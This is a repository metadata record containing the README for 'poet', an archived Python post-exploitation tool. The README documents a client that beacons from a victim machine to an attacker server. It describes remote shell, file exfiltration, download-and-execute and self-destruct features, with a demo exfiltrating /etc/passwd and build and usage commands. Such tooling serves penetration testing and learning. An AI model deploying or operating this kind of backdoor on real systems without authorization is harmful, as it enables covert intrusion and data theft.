{"id":17499565,"url":"https://github.com/offlinemark/poet","last_synced_at":"2025-03-17T12:30:58.046Z","repository":{"id":16798675,"uuid":"19557399","full_name":"offlinemark/poet","owner":"offlinemark","description":"[unmaintained] Post-exploitation tool ","archived":false,"fork":false,"pushed_at":"2016-01-28T17:45:27.000Z","size":168,"stargazers_count":183,"open_issues_count":25,"forks_count":55,"subscribers_count":13,"default_branch":"master","last_synced_at":"2024-10-19T21:26:41.489Z","etag":null,"topics":["beacon","pentest","post-exploitation","python","rat","security"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"spritebuilder/cocos2d-spritebuilder","license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/offlinemark.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2014-05-08T02:09:42.000Z","updated_at":"2024-08-12T19:13:50.000Z","dependencies_parsed_at":"2022-07-25T05:46:09.717Z","dependency_job_id":null,"html_url":"https://github.com/offlinemark/poet","commit_stats":null,"previous_names":[],"tags_count":9,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/offlinemark%2Fpoet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/offlinemark%2Fpoet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/offlinemark%2Fpoet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/offlinemark%2Fpoet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/offlinemark","download_url":"https://codeload.github.com/offlinemark/poet/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":221562599,"owners_count":16843802,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["beacon","pentest","post-exploitation","python","rat","security"],"created_at":"2024-10-19T17:28:19.973Z","updated_at":"2024-10-27T12:51:06.421Z","avatar_url":"https://github.com/offlinemark.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# poet\n\nA simple POst-Exploitation Tool.\n\n## overview\n\nThe client program runs on the target machine and is configured with an IP\naddress (the server) to connect to and a frequency to connect at. If the server\nisn't running when the client tries to connect, the client quietly sleeps and\ntries again at the next interval. If the server is running however, the\nattacker gets a control shell to control the client and perform various actions\non the target including:\n\n- reconnaissance\n- remote shell\n- file exfiltration\n- download and execute\n- self destruct\n\n## demo\n\nThis is just a small sample of what Poet can do.\n\nThe scenario is, an attacker has gotten access to the victim's machine and\ndownloaded and executed the client.  She does not have\nthe server running at this point, but it's ok, the client waits patiently.\nEventually the attacker is ready and starts the server, first starting a shell\nand executing `uname -a`, then exfiltrating `/etc/passwd`. Then she exits\nand detaches from the client, which continues running on the target waiting for\nthe next opportunity to connect to the server. Later, she connects again,\nself-destructing the client, removing all traces from the target.\n\nVictim's Machine (5.4.3.2):\n\n```\n$ ./poet-client 1.2.3.4 10  # poet-client daemonizes, so there's nothing to see\n```\n\n\u003e Warning: After running this command, you'll need to either run `selfdestruct`\n\u003e from the server, or kill the `poet-client` process to stop the client.\n\nAttacker's Machine (1.2.3.4):\n\n```\n$ sudo ./poet-server\n\n                          _\n        ____  ____  ___  / /_\n       / __ \\/ __ \\/ _ \\/ __/\n      / /_/ / /_/ /  __/ /\n     / .___/\\____/\\___/\\__/\n    /_/\n\n[+] (06/28/15 03:58:42) Dropping privileges to uid: 501, gid: 20\n[+] (06/28/15 03:58:42) Poet server started (port 443)\n[+] (06/28/15 03:58:50) Connected By: ('127.0.0.1', 54494) -\u003e VALID\n[+] (06/28/15 03:58:50) Entering control shell\nWelcome to posh, the Poet Shell!\nRunning `help' will give you a list of supported commands.\nposh \u003e help\nCommands:\n  chint\n  dlexec\n  exec\n  exfil\n  exit\n  help\n  recon\n  selfdestruct\n  shell\nposh \u003e shell\nposh \u003e user@server $ uname -a\nLinux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux\nposh \u003e user@server $ ^D\nposh \u003e exfil /etc/passwd\nposh : exfil written to archive/20150628/exfil/passwd-201506285917.txt\nposh \u003e ^D\n[+] (06/28/15 03:59:18) Exiting control shell\n[-] (06/28/15 03:59:18) Poet server terminated\n$ sudo ./poet-server\n\n                          _\n        ____  ____  ___  / /_\n       / __ \\/ __ \\/ _ \\/ __/\n      / /_/ / /_/ /  __/ /\n     / .___/\\____/\\___/\\__/\n    /_/\n\n[+] (06/28/15 03:59:26) Dropping privileges to uid: 501, gid: 20\n[+] (06/28/15 03:59:26) Poet server started (port 443)\n[+] (06/28/15 03:59:28) Connected By: ('127.0.0.1', 54542) -\u003e VALID\n[+] (06/28/15 03:59:28) Entering control shell\nWelcome to posh, the Poet Shell!\nRunning `help' will give you a list of supported commands.\nposh \u003e selfdestruct\n[!] WARNING: You are about to permanently remove the client from the target.\n    You will immediately lose access to the target. Continue? (y/n) y\n[+] (06/28/15 03:59:33) Exiting control shell\n[-] (06/28/15 03:59:33) Poet server terminated\n```\n\n## getting started\n\nGo to the [releases](http://github.com/mossberg/poet/releases) page and\ndownload the latest `poet-client` and `poet-server` files available.\n\nThen skip to the Usage section below.\n\nAlternatively, you can build Poet yourself (it's pretty easy, see below).\n\n## building\n\nMake sure you have the `python2.7` and `zip` executables available.\n\n```\n$ git clone https://github.com/mossberg/poet\n$ cd poet\n$ make\n```\n\nThis will create a `bin/` directory which contains `poet-client`\nand `poet-server`.\n\n## usage\n\nPoet is super easy to use, and requires nothing more than the Python (2.7)\nstandard library. To easily test it out, a typical invocation would look like:\n\nTerminal 1:\n\n```\n$ ./poet-client 127.0.0.1 1 --debug --no-selfdestruct\n```\n\n\u003e By default, the Poet client daemonizes and deletes itself from disk, so\n\u003e that behavior is suppressed using the `--debug` and `--no-selfdestruct`\n\u003e flags.\n\nTerminal 2:\n\n```\n$ sudo ./poet-server\n```\n\n\u003e By default, the server needs to be run as root (using `sudo`) because\n\u003e the default port it binds to is 443. If that makes you uncomfortable, simply\n\u003e omit `sudo` and use the `-p \u003cPORT\u003e` flag on both the client and server. Pick a\n\u003e nice, high number for your port (\u003e 1024).\n\n### configuration\n\nThe `common/config.py` file contains various **optional** configuration\nsettings for Poet builds.\n\n- `AUTH`: Secret authentication token shared between the client and server for\n  client authentication. Note that the default one is anything but secret. For\n  any non-testing usage, it is recommended to change it to another unguessable\n  value.  Note that pre-built packages use the default, public authentication\n  token.\n- `ARCHIVE_DIR`: Directory used by the server to store files (exec output,\n  exfil, recon, etc).\n- `SERVER_IP`: IP address of the server.\n- `BEACON_INTERVAL`: Seconds between client beacons to the server.\n\nThe `SERVER_IP` and `BEACON_INTERVAL` configurations allow information\npreviously required in command line arguments to be baked into the final\nexecutables such that the final executable can simply be executed with no\narguments. Values of `None` for either of them cause them to revert to default\nbehavior (required command line arg for `SERVER_IP`, optional command line\nargument for `BEACON_INTERVAL`).\n\n### client\n\n```\n$ ./poet-client -h\nusage: poet-client [-h] [-p PORT] [--debug] [--no-daemon] [--no-selfdestruct]\n                   IP [INTERVAL]\n\npositional arguments:\n  IP                    Poet Server\n  INTERVAL              Beacon Interval, in seconds. Default: 600\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -p PORT, --port PORT\n  --debug               show debug messages. implies --no-daemon\n  --no-daemon           don't daemonize\n  --no-selfdestruct     don't selfdestruct\n```\n\nPoet is a client/server application. The client is executed on the target and\nbeacons back to the server at a certain time interval. The only required\nargument is the IP address where the server is or will be running. Following\nit can optionally be the time interval in seconds of how frequently to beacon\nback, which defaults to 10 minutes. The port for the client to beacon out on\ncan be specified with the `-p` flag. All other flags would not be used during\n\"real\" usage and exist mainly for debugging.\n\n### server\n\n```\n$ ./poet-server -h\nusage: poet-server [-h] [-p PORT] [-v]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -p PORT, --port PORT\n  -v, --version         prints the Poet version number and exits\n```\n\nThe server is executed on the user's own machine and listens for beacons from\nthe client. By default, it listens on a privileged port (443) and must be run\nwith privileges (which are quickly dropped after binding). The `-p` flag can\nbe used to bypass this by selecting an unprivileged port to listen on (\u003e1024).\n\n### extensibility\n\nPoet is highly extensible through its module framework, in fact, nearly every\ncommand available at the posh shell is implemented as a module. They can be\nviewed in the `common/modules/` directory. The `common/modules/template.py`\nserves as a barebones example module, to be used as a starting point.\nTo add a Poet module, simply place it into the `common/modules/` directory\nand rebuild Poet using `make`.\n\nHere is a simple example module showing basic communication between the client\nand server. The module registers a posh command, sends a string over, the\nclient reverses it and sends it back, and the server prints it out.\n\n```\n# Note: this module doesn't check if an argv[1] was given\n\nimport module\n\n\n@module.server_handler('reverse')\ndef server(server, argv):\n    print 'Sending: {}'.format(argv[1])\n    # argv here is ['reverse', ...]\n    response = server.conn.exchange(' '.join(argv))\n    print 'Received: {}'.format(response)\n\n\n@module.client_handler('reverse')\ndef client(client, inp):\n    # inp here is 'reverse ...'\n    client.s.send(inp.split()[1][::-1])\n```\n\nThe module begins with\n\n```\nimport module\n```\n\nThis is required, and is needed to register with the module framework.\n\nThe next section is the server-side component of the module.\n\n```\n@module.server_handler('reverse')\ndef server(server, argv):\n    print 'Sending: {}'.format(argv[1])\n    # argv here is ['reverse', ...]\n    response = server.conn.exchange(' '.join(argv))\n    print 'Received: {}'.format(response)\n```\n\nThe `@module.server_handler()` decorator is used to register a posh command\nby passing in the command name as a decorator parameter and defining a handler\nfunction to execute when the command is run. The handler function must accept\ntwo parameters. One is the instance of the `PoetServer` that called the module,\nand the other is the command string entered, represented as a list of\narguments. The server instance exists for the module to be able to use\nhelper functions for communicating with the client, writing files to the\narchive directory, etc. The module uses `server.conn.exchange()` to send\nthe command line entered as a string to the client and get the response as the\nreturn value.\n\nThe client-side component of the module is next.\n\n```\n@module.client_handler('reverse')\ndef client(client, inp):\n    # inp here is 'reverse ...'\n    client.s.send(inp.split()[1][::-1])\n```\n\nThe `@module.client_handler()` decorator is used to register a task for the\nclient to react to and process. Since the client and server communicate by\npassing strings between them the first part of the string is the keyword\nfor a particular task. The module registers a client handler function to\nexecute when a message comes in from the server starting with 'reverse'.\nSimilar to the server handler, the client handler must accept parameters for\nthe instance of the `PoetClient` which called it, and the input string\npassed from the server. The client then uses the `client.s.send()` function\nto send data back to the server, in this case, the first argument, reversed.\n\nIn action, this looks like\n\n```\nposh \u003e reverse poet\nSending: poet\nReceived: teop\n```\n\n## concerns\n\nDocumented concerns:\n\n- lack of cryptographically protected communications\n- low interval beacons are **noisy** and generate TCP RSTs when the server is\n  inactive\n- shell command is not a \"real\" shell and does not support most builtins found\n  in standard shells\n\n## disclaimer\n\nI am building Poet purely for my own education and learning experience.\nThe code is freely available because I think it might be useful to others\ninterested in learning about this sort of thing. Use it responsibly.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fofflinemark%2Fpoet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fofflinemark%2Fpoet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fofflinemark%2Fpoet/lists"}